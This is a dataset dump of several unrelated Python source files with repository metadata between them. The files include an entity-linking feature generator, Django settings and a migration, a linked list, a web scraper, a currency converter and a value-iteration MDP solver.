    with open("/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/idmaps/wikiid2nnid.txt") as fin:
        for line in fin:
            ent_id, nnid = line.split('\t')
            wikiid2nnid[ent_id] = int(nnid) - 1   # torch starts from 1 instead of zero
        assert(wikiid2nnid["1"] == 0)
        assert(-1 not in wikiid2nnid)
        # Wiki id "1" doubles as the unknown-entity slot: re-key it as "<u>" -> 0.
        wikiid2nnid["<u>"] = 0
        del wikiid2nnid["1"]
        #print(len(wikiid2nnid))
        # Optionally merge in extension entities (appended after the max nn id).
        if extension_name:
            load_entity_extension(wikiid2nnid, extension_name)
        return wikiid2nnid
def load_entity_extension(wikiid2nnid, extension_name):
    """Append extension entities' wiki ids to *wikiid2nnid* in place.

    New ids receive consecutive nn ids after the current maximum. Ids that
    clash with an existing entry are stored under ``<id>dupl`` so the
    numbering stays dense (those duplicate slots are never used).

    NOTE(review): *extension_name* is accepted but unused — the file path is
    hard-coded; confirm whether it was meant to select the file.
    """
    filepath = "/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/idmaps/additional_wikiids.txt"
    max_nnid = max(wikiid2nnid.values())
    assert(len(wikiid2nnid) - 1 == max_nnid)
    with open(filepath) as fin:
        line_cnt = 1
        for line in fin:
            ent_id = line.strip()
            if ent_id in wikiid2nnid:  # if extension entities has overlap with the normal entities set
                wikiid2nnid[ent_id + "dupl"] = max_nnid + line_cnt  # this vector is duplicate and is never going to be used
            else:
                wikiid2nnid[ent_id] = max_nnid + line_cnt
            line_cnt += 1
    print("original entities: ", max_nnid + 1, " extension entities: ", len(wikiid2nnid) - (max_nnid+1))
def load_graph_vec(path=None):
    """Load the graph-based entity embedding matrix (``.npy``) from disk."""
    #path='preprocess/vectors/ent_vecs_graph.npy'
    default = '/Users/sevgili/PycharmProjects/end2end_neural_el/data/entities/ent_vecs/ent_vecs_graph.npy'
    return np.load(default if path is None else path)
def load_graph2wiki(path=None):
    """Read the graph-id -> wiki-id mapping (tab-separated ints).

    Returns:
        (id2idmap, multiple_references): *id2idmap* maps each graph id to the
        set of wiki ids seen for it; *multiple_references* contains every
        graph id that appeared on more than one input line.
    """
    if path is None:
        path = '/Users/sevgili/PycharmProjects/group/kb2vec/supervised/preprocess/idmaps/graphid2wikiid.txt'
    id2idmap = dict()
    multiple_references = set()
    with open(path) as fin:
        for line in fin:
            id1, id2 = line.split('\t')
            id1, id2 = int(id1), int(id2)
            # Membership test instead of the original bare ``except:`` control
            # flow (which also swallowed KeyboardInterrupt/SystemExit).
            if id1 in id2idmap:
                id2idmap[id1].add(id2)
                multiple_references.add(id1)
            else:
                id2idmap[id1] = {id2}
    return id2idmap, multiple_references
class InputVecGenerator(object):
    """Builds (feature vector, label) pairs for entity-linking candidates.

    Each feature vector concatenates four embeddings: mention-span doc2vec,
    candidate graph embedding, chunk context embedding, and the candidate's
    DBpedia long-abstract doc2vec.
    """

    def __init__(self, graph_entity_path=None, doc2vec_path=None,
                 url2graphid_db=None, graphid2url_db=None, url2longabs_db=None):
        # Heavyweight resources (embeddings, doc2vec model, sqlite dicts) are
        # loaded once here and reused for every sample.
        self.sample_generator = prepro_util.InputSamplesGenerator(url2graphid_db)
        self.chunkid2contextid = load_chunkid2contextid()
        self.context_vecs = load_context_vec()
        self.doc2vec = load_doc2vec(doc2vec_path)
        self.wiki2nn = load_wikiid2nnid(extension_name='extension_entities')
        self.url2longabs = load_longabs(url2longabs_db)
        self.graph_vecs = load_graph_vec(graph_entity_path)
        self.graphid2wikiid,_ = load_graph2wiki()
        self.graphid2url = load_graphid2url(graphid2url_db)

    def create_input_vec(self, sample):
        """Yield (inputvec, label) pairs for one *training* sample.

        Label is ``np.array([1])`` when the candidate equals the gold entity,
        else ``np.array([0])``.
        """
        chunk_id, chunk_words, begin_gm, end_gm, ground_truth, cand_entities, cand_entities_scores = sample
        for index in range(len(begin_gm)):
            candidate_entities_, ground_truth_id, begin, end = cand_entities[index],\
                                                               ground_truth[index], begin_gm[index], end_gm[index]
            #print(ground_truth_id, begin, end)
            # NOTE(review): ``ground_truth`` is the whole *list* here, so
            # ``ground_truth != -1`` is almost always true — the per-mention
            # check was probably meant to use ``ground_truth_id``. Confirm.
            if ground_truth != -1 or len(candidate_entities_) > 0:  # for the one we have the correct result
                # Pre-computed context embedding for this chunk.
                context_vec = self.context_vecs[self.chunkid2contextid[chunk_id]]
                span_text = ' '.join(chunk_words[begin:end])
                try:
                    word_vec = self.doc2vec[span_text]
                except KeyError:
                    # Span not in the doc2vec vocabulary: infer a vector instead.
                    word_vec = self.doc2vec.infer_vector(span_text)
                for cand in candidate_entities_:
                    # Long-abstract text for the candidate, embedded on the fly.
                    longab = self.url2longabs[self.graphid2url[cand]]
                    longab_vec = self.doc2vec.infer_vector(word_tokenize(longab))
                    # A graph id can map to several wiki ids; the first is used.
                    wiki_ids = list(self.graphid2wikiid[int(cand)])
                    wiki_id = wiki_ids[0]
                    nn_id = self.wiki2nn[str(wiki_id)]
                    graph_vec = self.graph_vecs[int(nn_id)]
                    inputvec = np.concatenate((np.array(word_vec), np.array(graph_vec),
                                               np.array(context_vec), np.array(longab_vec)), axis=0)
                    if int(cand) == int(ground_truth_id):
                        # 1 means positive
                        yield (inputvec, np.array([1]))
                    else:
                        # 0 means negative
                        yield (inputvec, np.array([0]))

    def create_input_vec_for_evaluation(self, sample):
        """Yield (inputvec, candidate_id) pairs for one *evaluation* mention.

        NOTE(review): unlike training, the context vector is inferred from the
        chunk words instead of read from the pre-computed matrix — confirm
        this asymmetry is intentional.
        """
        chunk_id, chunk_words, begin, end, ground_truth, candidate_entities, cand_entities_scores = sample
        #print(chunk_words, candidate_entities, begin, end)
        if len(candidate_entities) > 0:
            context_vec = self.doc2vec.infer_vector(chunk_words)
            span_text = ' '.join(chunk_words[begin:end])
            #print('span', span_text)
            try:
                word_vec = self.doc2vec[span_text]
            except KeyError:
                word_vec = self.doc2vec.infer_vector(span_text)
            for cand in candidate_entities:
                longab = self.url2longabs[self.graphid2url[cand]]
                longab_vec = self.doc2vec.infer_vector(word_tokenize(longab))
                wiki_ids = list(self.graphid2wikiid[int(cand)])
                wiki_id = wiki_ids[0]
                nn_id = self.wiki2nn[str(wiki_id)]
                graph_vec = self.graph_vecs[int(nn_id)]
                inputvec = np.concatenate((np.array(word_vec), np.array(graph_vec),
                                           np.array(context_vec), np.array(longab_vec)), axis=0)
                # Batch dimension of 1 so the vector can be fed to the model directly.
                yield (np.array([inputvec]), cand)

    def format(self, list_sample):
        """Split a list of (input, output) pairs into two parallel numpy arrays."""
        inputs, outputs = list(), list()
        index = 0
        for sample in list_sample:
            inputs.insert(index, sample[0])
            outputs.insert(index, sample[1])
            index += 1
        return np.array(inputs), np.array(outputs)

    # path of dataset
    def process(self, path='/Users/sevgili/PycharmProjects/end2end_neural_el/data/new_datasets/ace2004.txt', ttl=False):
        """Build, shuffle and format the full (inputs, outputs) training set for *path*."""
        samples = list()
        count = 0
        for sample in self.sample_generator.process(path, ttl=ttl):
            #chunk_id, chunk_words, begin_gm, end_gm, ground_truth, cand_entities, cand_entities_scores = sample
            #print(chunk_words, begin_gm, end_gm, cand_entities)
            #print('lengths', len(begin_gm), len(end_gm), len(cand_entities))
            for input_vec in self.create_input_vec(sample):
                if input_vec == -1:
                    return -1
                samples.append(input_vec)
            count += 1
        print('# of context', count)
        print('finished creating input files', len(samples))
        shuffle(samples)
        print('finished shuffling samples')
        inputs, outputs = self.format(samples)
        print('finished formatting')
        return inputs, outputs
if __name__ == "__main__":
    # Ad-hoc driver: build (and discard) input vectors for the MSNBC benchmark.
    inputvecgenerator = InputVecGenerator()
    inputvecgenerator.process(path='/Users/sevgili/PycharmProjects/end2end_neural_el/data/new_datasets/msnbc.txt')
|
[
"[email protected]"
] | |
10c5cd8101cff8672ef60125ceffa4769b4d7c27
|
21682f70ff130169d8800a06b1a6d8bf7f46e45a
|
/functions/decoraters/variablelengthargument/demo.py
|
15d8a2f86e7c77c3241c3e719adc2bc1555f7f55
|
[] |
no_license
|
Aravind2595/MarchPythonProject
|
03c3aeee40f5ff2c635861ac29f31a7633499d51
|
9aa9241632b7f96e7e1cb33b3adb7b8def36f1f8
|
refs/heads/master
| 2023-05-05T04:16:45.556737 | 2021-05-20T08:43:52 | 2021-05-20T08:43:52 | 368,791,704 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 252 |
py
|
def add(*args):
    """Return the sum of all positional arguments (zero arguments yields 0).

    ``*args`` packs every positional argument into a tuple, so any number of
    values — including none — is accepted.
    """
    return sum(args)


print(add(10, 20, 30, 40))
|
[
"[email protected]"
] | |
a55a5dbb88d327f149accfe6b902a079dd80d019
|
fe43d0dcab4ae34321ba6139bf113cf0519cd037
|
/cursos/migrations/0004_auto_20200603_2017.py
|
a913f986879023196703b626704ff3b8b86b635d
|
[] |
no_license
|
clecio-sousa/projeto-market-place
|
3ab23608db01dd3a07bfafe24a45a342e7e40730
|
af3cdb13708eca771b3abdb402613d4c850c4dae
|
refs/heads/master
| 2023-03-29T19:59:41.693098 | 2021-04-06T02:40:45 | 2021-04-06T02:40:45 | 355,030,540 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 640 |
py
|
# Generated by Django 3.0.6 on 2020-06-03 23:17
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add ``Curso.slug`` and update the ``data_publicacao`` default.

    NOTE(review): the new DateTimeField default is a *fixed* timestamp frozen
    at generation time (not a callable such as ``timezone.now``), so every
    future row will default to 2020-06-03 20:17 unless set explicitly.
    """

    dependencies = [
        ('cursos', '0003_auto_20200603_1842'),
    ]

    operations = [
        migrations.AddField(
            model_name='curso',
            name='slug',
            field=models.SlugField(blank=True, max_length=30, null=True),
        ),
        migrations.AlterField(
            model_name='curso',
            name='data_publicacao',
            field=models.DateTimeField(blank=True, default=datetime.datetime(2020, 6, 3, 20, 17, 42, 953278)),
        ),
    ]
|
[
"[email protected]"
] | |
1e4fc17bed5f3bca085566203de7580dbe427874
|
b5187b5ffd53a2cdc8ec6ed94effc39702c1ea31
|
/loyalty_app/loyalty/doctype/sales_list/sales_list.py
|
3f630555c69f95a1f081ba33f89e1bac9d77c915
|
[
"MIT"
] |
permissive
|
vignesharumainayagam/engagex-loyalty_app-backup-
|
946a7f75c5ae5cce33313142a0b4e6ba29d67cb6
|
4c326c5f7b22572146f0b946d6498e85ac22a143
|
refs/heads/master
| 2020-03-11T18:00:14.106005 | 2018-04-19T05:36:06 | 2018-04-19T05:36:06 | 130,163,935 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 254 |
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Loyalty and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe.model.document import Document
class Sales_list(Document):
    """Frappe DocType controller for "Sales list" — no custom behaviour yet."""
    pass
|
[
"[email protected]"
] | |
9713d01cfa2fe2619b7f1a674adc7200e8760e05
|
c5f0b15b4e03cbf29092d1c05bc8361490df76e4
|
/run_vehicle.py
|
76803862b6148fffc8a0d929556730642e602fe7
|
[] |
no_license
|
e-harris/vehicle_classes
|
3fa152ec9757f313851d448b4ab1dd78b0d9b8fe
|
c17d3b109cafc1a9be0a2a9280654dcfcf0d8c47
|
refs/heads/master
| 2021-03-03T22:48:59.242550 | 2020-03-09T09:16:24 | 2020-03-09T09:16:24 | 245,991,001 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 285 |
py
|
from vehicle_class import *
from plane_class import *
from car_class import *
# NOTE(review): positional-argument meanings inferred from usage only — the
# constructors live in car_class/plane_class; confirm field order before editing.
car1 = car(2, "none", "Ferrari", 680, 185)
car2 = car(5, "small", "Vauxhall", 120, 135)
plane1 = plane(100, "passengers and luggage", "40,000", 10, 2)
plane2 = plane(10,"passengers", "55,000", 4, 2)
|
[
"[email protected]"
] | |
ea02622ccae8492548b091136b268bf259b5cebd
|
23ec6adce704bff40d04cd6fc0ba446375405b68
|
/Non Leetcode Solutions/linked_list_py.py
|
378d3a34b439b5b394c573f968a35ed1cc2897d6
|
[] |
no_license
|
amoghrajesh/Coding
|
1845be9ea8df2d13d2a21ebef9ee6de750c8831d
|
a7dc41a4963f97dfb62ee4b1cab5ed80043cfdef
|
refs/heads/master
| 2023-08-31T10:10:48.948129 | 2023-08-30T15:04:02 | 2023-08-30T15:04:02 | 267,779,618 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,952 |
py
|
class Node(object):
    """Singly linked list node: a payload plus a reference to its successor."""

    def __init__(self, data, next_node=None):
        self.data = data
        self.next_node = next_node

    def get_next(self):
        """Return the successor node (``None`` at the tail)."""
        return self.next_node

    def set_next(self, next_node):
        """Re-link this node to a new successor."""
        self.next_node = next_node

    def get_data(self):
        """Return the stored payload."""
        return self.data

    def set_data(self, data):
        """Replace the stored payload."""
        self.data = data

    def has_next(self):
        """True when a successor node exists."""
        return self.get_next() is not None

    def toString(self):
        """String form of the payload (kept for API compatibility)."""
        return str(self.get_data())
class LinkedList(object):
    """Singly linked list with O(1) prepend and linear search/removal."""

    def __init__(self, r=None):
        self.root = r
        self.size = 0

    def get_size(self):
        """Number of nodes currently in the list."""
        return self.size

    def add(self, d):
        """Prepend a new node carrying *d* (add at beginning)."""
        new_node = Node(d, self.root)
        self.root = new_node
        self.size += 1

    def remove(self, data):
        """Unlink the first node whose payload equals *data*; True on success."""
        this_node = self.root
        prev_node = None
        while this_node is not None:
            if this_node.get_data() == data:
                if prev_node is not None:
                    prev_node.set_next(this_node.get_next())
                else:
                    # removing the head: advance the root pointer
                    self.root = this_node.get_next()
                self.size -= 1
                return True
            else:
                prev_node = this_node
                this_node = this_node.get_next()
        return False

    def find(self, data):
        """True when some node's payload equals *data*."""
        this_node = self.root
        while this_node is not None:
            if this_node.get_data() == data:
                return True
            this_node = this_node.get_next()
        return False

    def print_list(self):
        """Print every payload, head to tail.

        Bug fix: the original looped ``while this_node.has_next()``, which
        never printed the final node and raised AttributeError on an empty
        list (``None.has_next()``). Iterating until ``None`` fixes both.
        """
        this_node = self.root
        while this_node is not None:
            print(this_node.toString())
            this_node = this_node.get_next()
# Quick manual smoke test: after the four prepends the list is 2 -> 6 -> 4 -> 1.
myList=LinkedList()
myList.add(1)
myList.add(4)
myList.add(6)
myList.add(2)
print("size:",myList.get_size())
'''myList.remove(6)
print("size:",myList.get_size())
print("Is 2 present?",myList.find(-2))'''
myList.print_list()
|
[
"[email protected]"
] | |
ecadfa08af60d3d184ece78cbecf7ec9acff06ae
|
82e330917892cdd1c1c2b3885bf319172635a7dc
|
/01_get_name.py
|
75ba9c6dd4da6831f3be4803a7581b693f0323b1
|
[] |
no_license
|
harada0510/LDA_topic_model
|
0b0f00f049a96b37473a1bee02e76aaf83a1a8af
|
8a47780114a3993ed37d9e25e821def47a5d5566
|
refs/heads/master
| 2022-08-10T11:27:05.405925 | 2020-05-17T16:02:21 | 2020-05-17T16:02:21 | 255,925,782 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 525 |
py
|
# coding: utf-8
import requests
from bs4 import BeautifulSoup

# Scrape the Japanese Wikipedia "list of universities in Japan" page and write
# every university name between 愛国学園大学 and 和洋女子大学 (inclusive) to
# university.txt, one per line.
r = requests.get("https://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E3%81%AE%E5%A4%A7%E5%AD%A6%E4%B8%80%E8%A6%A7")
soup = BeautifulSoup(r.text, "html.parser")

# ``with`` guarantees the output file is closed even if parsing raises
# (the original used a bare open()/close() pair, leaking on error).
with open("university.txt", "w") as b:
    flg = 0  # 1 while inside the target alphabetical range
    for a in soup.find_all("a"):
        if "愛国学園大学" == a.text:
            flg = 1
        if flg == 1 and "大学" in a.text:
            print(a.text, a.attrs['href'])
            b.write(a.text + "\n")
        if "和洋女子大学" == a.text:
            # flag cleared *after* writing, so the final name is included
            flg = 0
|
[
"[email protected]"
] | |
320687db2d1fc6caf127a9b4f5b1f96927e80f57
|
2acd3d3616ab6ae6a56602f8c28c9cb2d6fd6db0
|
/config/settings.py
|
13c13dee96727b13a815724aa918b12547a4d6e4
|
[] |
no_license
|
EgorovM/hb_maker
|
45f3d7375d3aa5c06127f5bfc7cab2bff88192da
|
d0524cc81e5c5cb85b4de1a397219876d44daf42
|
refs/heads/main
| 2023-09-03T05:09:39.297948 | 2021-11-11T20:43:47 | 2021-11-11T20:43:47 | 352,812,794 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,274 |
py
|
"""
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-cu6ykde21-!@=582-#1mgj$5xhph@hxybo1qqtsut8uas^w@b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'creator',
'viewer',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static',)
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media',)
MEDIA_URL = '/media/'
|
[
"[email protected]"
] | |
4d4a2cd8c7b880f58d88cf2c676256acdae1c32c
|
e789ea3fd9a6ff64f89f90388e4999bf32183e25
|
/Simple/loop2.py
|
2a335f0bbc32e9710aaf40aee71af5012933b25e
|
[
"MIT"
] |
permissive
|
Nahalius/PythonBasics
|
dfe6978de290b26d4bab2d1775c42b2abc53cb17
|
f59f167cb7c3edf962cb381ee7d66394da500a11
|
refs/heads/master
| 2020-12-30T15:30:40.417782 | 2017-05-28T07:33:17 | 2017-05-28T07:33:17 | 91,152,809 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 387 |
py
|
# -*- coding: utf-8 -*-

#WhileLoop
# Count down from 5 to 1, printing the counter on each pass.
counter = 5;
while counter > 0:
    print ("Broiach = ", counter)
    counter = counter - 1

#Break and continue
j = 0;
for i in range(5): #range (start, end, step)
    j = j + 2
    print ('i = ', i, ', j = ', j)
    if j == 4:
        continue  # jumps to the next iteration, skipping the print below
    print("I will be skipped over if j = 4")
    if j == 6:
        break  # leaves the loop entirely once j reaches 6

#Use try to display errors
|
[
"[email protected]"
] | |
f2f6849f452be00fd78a4d71ef94cbd1d111f88a
|
f8be36a49d9cd0c5ad4c4e9ab0958bca76d27976
|
/sources/python/genscript/calculate.py
|
e407037cf9c1b886ef6a209dcddc2eb4d2990a85
|
[] |
no_license
|
demlanide/psytestgen
|
156197e175053bb324ebc8a67b1bc168df0848f0
|
b3530882d790e7e99738c121d23f38425552a690
|
refs/heads/master
| 2023-06-24T06:07:46.301591 | 2021-07-21T20:39:25 | 2021-07-21T20:39:25 | 388,239,664 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,093 |
py
|
import sqlite3
from openpyxl import load_workbook
import sys

# Fill in a user's "derived" trait results (stored as '~<source-trait-id>')
# by applying per-trait linear regressions (a + b * source_result) whose
# coefficients live in the analysis workbook.
id_user = str(sys.argv[1])

connection = sqlite3.connect("/Users/dameli/Desktop/diploma/generator/sources/gendb.db")
crsr = connection.cursor()

sql_command = "SELECT count(*) FROM traits"
crsr.execute(sql_command)
ans = crsr.fetchall()
n = ans[0][0]

sql_command = "SELECT id_trait FROM traits"
crsr.execute(sql_command)
ans = crsr.fetchall()
lst = ans

wb = load_workbook("/Users/dameli/Desktop/diploma/generator/sources/analysis.xlsx")
title1 = 'regression_a'  # worksheet holding the regression "a" coefficients
title2 = 'regression_b'  # worksheet holding the regression "b" coefficients

sql_command = "SELECT id_trait, result FROM (SELECT id_user, id_trait, result FROM results WHERE result LIKE '~%') WHERE id_user = ?"
# Bug fix: sqlite3 expects parameters as a *sequence*; passing the bare string
# bound each character separately and failed for multi-digit user ids.
crsr.execute(sql_command, (id_user,))
ans = crsr.fetchall()

tests_num = []          # trait ids whose result still needs to be computed
answers_evaluate = []   # matching '~<source-id>' markers naming the source trait
for i in range(0, len(ans)):
    tests_num.append(ans[i][0])
    answers_evaluate.append(ans[i][1])

k = len(tests_num)
# NOTE(review): the outer loop re-runs the whole inner pass len(tests_num)
# times; it looks like a retry loop for results that depend on other
# not-yet-computed results — confirm before simplifying.
while k > 0:
    for i in range(0, len(tests_num)):
        x = int(answers_evaluate[i][1:])  # source trait id (leading '~' stripped)
        y = int(tests_num[i])             # derived trait id being filled in
        a = wb[title1].cell(row=x, column=y).value
        b = wb[title2].cell(row=x, column=y).value
        sql_command = "SELECT result FROM results WHERE id_user = ? AND id_trait = " + str(x) + " AND result IS NOT NULL AND result NOT LIKE '~%'"
        crsr.execute(sql_command, (id_user,))
        ans = crsr.fetchall()
        if len(ans) != 0:
            test_res = ans[0][0]
            res = str(int(a + b * test_res))
            # NOTE(review): id_user is concatenated into the SQL here (it comes
            # from argv); parameterize fully if this ever takes untrusted input.
            sql_command = "UPDATE results SET result = ? WHERE id_user = " + id_user + " AND id_trait = " + str(y)
            crsr.execute(sql_command, (res,))
            connection.commit()
    k -= 1
|
[
"[email protected]"
] | |
b1df1327d79b654f1819f0289b69a4ab8c88928c
|
ee052bcf1a0836156c5d97a6a0aa4ed45dc19716
|
/currencyConverter.py
|
8d73a79f044e27d75dfad40f3bd5cdf6c483e90e
|
[] |
no_license
|
JATIN-RATHI/CurrencyConverter
|
194f88166cece1f30a97cf0bc1ef6f4884d3c5a1
|
ca15cdb3ab6f87180460d8bf572a7816d7928015
|
refs/heads/master
| 2022-11-21T03:04:57.031541 | 2020-07-23T09:43:43 | 2020-07-23T09:43:43 | 281,911,713 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,952 |
py
|
# Link :---> https://www.x-rates.com/table/?from=INR&amount=1
if __name__ == '__main__':
    # Load "currency-name<TAB>rate" lines scraped from x-rates.com.
    with open('currencyDATA') as f:
        lines = f.readlines()

    # Renamed from ``dict`` — the original shadowed the builtin type.
    rates = {}
    for line in lines:
        parsed = line.split("\t")
        rates[parsed[0]] = parsed[1]

    print("Choose any one to convert Indian currency into : \n1: Argentine Peso\n2: Australian Dollar\n3: Bahraini "
          "Dinar\n4: Botswana Pula\n5: Brazilian Real\n6: British Pound\n7: Bruneian Dollar\n8: Bulgarian Lev\n9: "
          "Canadian Dolla\n10: Chilean Peso\n11: Chinese Yuan Renminbi\n12: Colombian Peso\n13: Croatian Kuna\n14: "
          "Czech Koruna\n15: Danish Krone\n16: Emirati Dirham\n17: Euro\n18: Hong Kong Dollar\n19: Hungarian "
          "Forint\n20: Icelandic Krona\n21: Indonesian Rupiah\n22: Iranian Rial\n23: Israeli Shekel\n24: Japanese "
          "Yen\n25: Kazakhstani Tenge\n26: Kuwaiti Dinar\n27: Libyan Dinar\n28: Malaysian Ringgit\n29: Mauritian "
          "Rupee\n30: Mexican Peso\n31: Nepalese Rupee\n32: New Zealand Dollar\n33: Norwegian Krone\n34: Omani "
          "Rial\n35: Pakistani Rupee\n36: Philippine Peso\n37: Polish Zloty\n38: Qatari Riyal\n39: Romanian New "
          "Leu\n40: Russian Ruble\n41: Saudi Arabian Riyal\n42: Singapore Dollar\n43: South African Rand \n44: "
          "South Korean Won\n45: Sri Lankan Rupee\n46: Swedish Krona\n47: Swiss Franc\n48: Taiwan New Dollar\n49: "
          "Thai Baht\n50: Trinidadian Dollar\n51: Turkish Lira\n52: US Dollar\n53: Venezuelan Bolivar")

    # Dicts preserve insertion order (3.7+), so menu position N maps straight
    # to the N-th (name, rate) line of the data file.
    choose = int(input("Enter your choice : ")) - 1
    currency_name, currency_value = list(rates.items())[choose]

    amount = int(input("Enter amount to be converted: "))
    total = amount * float(currency_value)
    print(f"{amount} Indian Rupee = {total} {currency_name} ")
|
[
"[email protected]"
] | |
feaa839db358be617d5064a1b3db799632606b49
|
2dce8d098f5f3c93abdfc388e6dac319bfb6450d
|
/Projetos/des087.py
|
fac0cbacecf04db47728a64caac0a77cf6046304
|
[
"MIT"
] |
permissive
|
LucasDeAndradeMarin/Marin-python-training
|
9fe27c5ae04755e8bbcc6609ca3d60ab9f4bfbaf
|
9537f6ff26fa1f93e20aee306f35a71765d7fdd1
|
refs/heads/main
| 2023-04-28T01:28:15.084559 | 2021-05-18T13:32:04 | 2021-05-18T13:32:04 | 368,541,703 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 702 |
py
|
# Read a 3x3 integer matrix from the user, then compute its determinant via
# the rule of Sarrus (main-diagonal products minus anti-diagonal products).
matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
for l in range(0, 3):
    for c in range(0, 3):
        matriz[l][c] = int(input(f'Digite um valor para [{l}, {c}]: '))
# Sum of the three "main" (top-left to bottom-right) diagonal products.
princ = (matriz[0][0]*matriz[1][1]*matriz[2][2]) + (matriz[0][1]*matriz[1][2]*matriz[2][0]) + (matriz[0][2]*matriz[1][0]*matriz[2][1])
# Sum of the three "secondary" (bottom-left to top-right) diagonal products.
sec = (matriz[2][0]*matriz[1][1]*matriz[0][2]) + (matriz[2][1]*matriz[1][2]*matriz[0][0]) + (matriz[2][2]*matriz[1][0]*matriz[0][1])
det = princ - sec
print('-=-'*30)
# Echo the matrix back in a grid of 5-wide centred cells.
for l in range(0, 3):
    for c in range(0, 3):
        print(f'[{matriz[l][c]:^5}]', end='')
    print()
print('-=-'*25)
print(f'Como a diagonal principal equivale à {princ} e a secundária à {sec}, o determinante equivale à: {det}')
|
[
"[email protected]"
] | |
a43de45d509562e3a2e9e6e97acf12b91554dfdf
|
b6a4059b31448f47ecf641fbdee7a6b13aec0933
|
/MDP Solving Algorithms/ValueIteration.py
|
abb414b495aab01f617bb390cb84b666a86669c7
|
[] |
no_license
|
Calman102/BMath--Hons.--Thesis-Code
|
57bbb49483480ae91338ed15cbd8cfab05167054
|
0115ae76e2476b4c40c5c8e58455c5496d455ceb
|
refs/heads/master
| 2023-01-13T07:06:17.820966 | 2020-10-23T11:31:41 | 2020-10-23T11:31:41 | 296,011,163 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 478 |
py
|
import numpy as np
def VI(S, A, P, R, ε, γ):
    """Value Iteration: return (V, π) for the MDP (S, A, P, R).

    V starts from the best one-step reward per state and is swept in place
    (Gauss-Seidel style) until it moves less than ε in sup-norm; π is then
    the greedy policy with respect to the converged values.
    """
    V = np.max(R, 1)
    π = np.zeros(len(S))

    # Value improvement: keep sweeping while the largest change is >= ε.
    delta = ε
    while delta >= ε:
        previous = V.copy()
        for s in S:
            V[s] = np.max(R[s] + γ*(P @ V)[s])
        delta = np.max(np.abs(V - previous))

    # Policy extraction: greedy action per state under the final V.
    for s in S:
        π[s] = np.argmax(R[s] + γ*(P @ V)[s])
    return (V, π)
|
[
"[email protected]"
] | |
ed13a2f82e64a2a0f974e4a2f874097a01dc0b63
|
c75061046131f369f05b86fc9c73c6bc5274435c
|
/main.py
|
8d7b83aece0845b1924d206b14a8093a1da8b007
|
[] |
no_license
|
YK2006/Elite-Qualifier
|
8b294cae417def9e9e7c6d5be54ca09b0b572012
|
a333515e97edbf36fc3813d8ffe61595fa28b379
|
refs/heads/master
| 2023-08-02T07:21:26.695343 | 2021-09-21T21:57:32 | 2021-09-21T21:57:32 | 329,127,428 | 0 | 0 | null | 2021-09-21T21:57:33 | 2021-01-12T22:21:13 |
Python
|
UTF-8
|
Python
| false | false | 792 |
py
|
import nltk
from nltk.corpus import words
from nltk.metrics.distance import (
    edit_distance,
    jaccard_distance,
    )
from nltk.util import ngrams
